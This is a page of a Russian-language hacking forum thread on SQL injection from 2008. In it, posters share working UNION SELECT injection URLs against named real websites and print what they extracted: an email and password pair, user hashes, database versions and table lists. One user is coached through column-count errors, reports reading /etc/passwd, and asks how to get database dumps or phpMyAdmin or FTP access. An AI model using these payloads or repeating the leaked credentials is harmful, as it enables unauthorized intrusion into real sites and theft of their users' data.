ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 517 из 1242 « Первая < 17417467507 513 514 515 516 517 518 519 520 521 5275676171017 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5161  
Старый 23.03.2008, 00:58
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Muhacir
тебе делать нечего? человек написал:
"прошу на обсуждение в вопросы по уязвимостям"
Как ты думаешь зачем?Там полтора часа назад то_же самое обсуждали
 
Ответить с цитированием

  #5162  
Старый 23.03.2008, 01:40
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию
Код:
http://www.canadahaitiaction.ca/local.php?id=-6+union+select+1,concat(email,0x3a,pass)+from+Members+limit+0,1/*
digitalindependence@riseup.net:shawn

Код:
http://www.furthernoise.org/index.php?iss=-6+union+select+1,concat(name,0x3a,pass)+from+fn_users/*
Andy:‰ ÿ@b宽I™Þ_ˆý о_О какой то странный пароль

Код:
http://ukmoths.org.uk/show.php?id=-75+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,concat(version(),0x3a,database(),0x3a,user()),16/*
4.1.19-standard-log:ukmoths:ukmoths@server213-171-218-204.livedns.org.uk
 
Ответить с цитированием

  #5163  
Старый 23.03.2008, 13:40
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
http://www.ococtexas.org/
Код:
http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11/*
Код:
5.0.45-community-nt:ococ@localhost:ococ
Код:
http://www.ococtexas.org/page.php?id=0x3327%20union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10,11%20FROM%20INFORMATION_SCHEMA.TABLES%20--
Цитата:
• CHARACTER_SETS
• COLLATIONS
• COLLATION_CHARACTER_SET_APPLICABILITY
• COLUMNS
• COLUMN_PRIVILEGES
• KEY_COLUMN_USAGE
• PROFILING
• ROUTINES
• SCHEMATA
• SCHEMA_PRIVILEGES
• STATISTICS
• TABLES
• TABLE_CONSTRAINTS
• TABLE_PRIVILEGES
• TRIGGERS
• USER_PRIVILEGES
• VIEWS
• age
• call_track
• contract_time
• cp_user
• family
• group
• hear_from
• kids
• language
• message
• news
• race
• reason
• static_page
• status

http://www.ztocapital.com/
Код:
http://www.ztocapital.com/Page.php?id=-1'%20union+select+1,2,3,4,5,6,7,8,9/*
5.0.45-community-nt:zto@localhost:zto
 
Ответить с цитированием

  #5164  
Старый 23.03.2008, 15:40
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Ребят, помогите, скуль на запрос "id=9999+union+select+null,null,null/*" выдает такое сообщение - "The used SELECT statements have a different number of columns", а я ЛОХ непойму что делать...
 
Ответить с цитированием

  #5165  
Старый 23.03.2008, 15:42
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
 
Ответить с цитированием

  #5166  
Старый 23.03.2008, 15:49
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Цитата:
Сообщение от Piflit  
mff количество выводимых полей не подходит. юзай другое. например, select 1,2/* select 1,2,3/* итд. пока не исчезнет эта ошибка. вообще, есть другая тема.
Спасибо Piflit, буду пробывать! Тут вот еще выдали на запрос "id=9999'+union+select+1,2,3/*" - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' union select 1,2,3/*' at line 1"
 
Ответить с цитированием

  #5167  
Старый 23.03.2008, 15:52
Spaise
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208

Репутация: 21
По умолчанию
ковычка не нужна
 
Ответить с цитированием

  #5168  
Старый 23.03.2008, 15:56
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Цитата:
Сообщение от Spaise  
ковычка не нужна
ага, убрал ее! но что то никак не выходит, перебираю 1,2,3.. и т.д. php выдаёт "The used SELECT statements have a different number of columns"
 
Ответить с цитированием

  #5169  
Старый 23.03.2008, 15:56
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Ура получилось, не терпиливый я ЛОХ...
 
Ответить с цитированием

  #5170  
Старый 23.03.2008, 16:11
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию
Ребят, а что дальше то делать? Ну получил я DATABASE(), USER(), VERSION() и LOAD_FILE('/etc/passwd')! Но что с этим добром делать, мне нужен просто дам базы данных либо вход через phpmyadmin либо аккаунт ftp

Помогите плис
 
Ответить с цитированием
Ответ
Страница 517 из 1242 « Первая < 17417467507 513 514 515 516 517 518 519 520 521 5275676171017 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ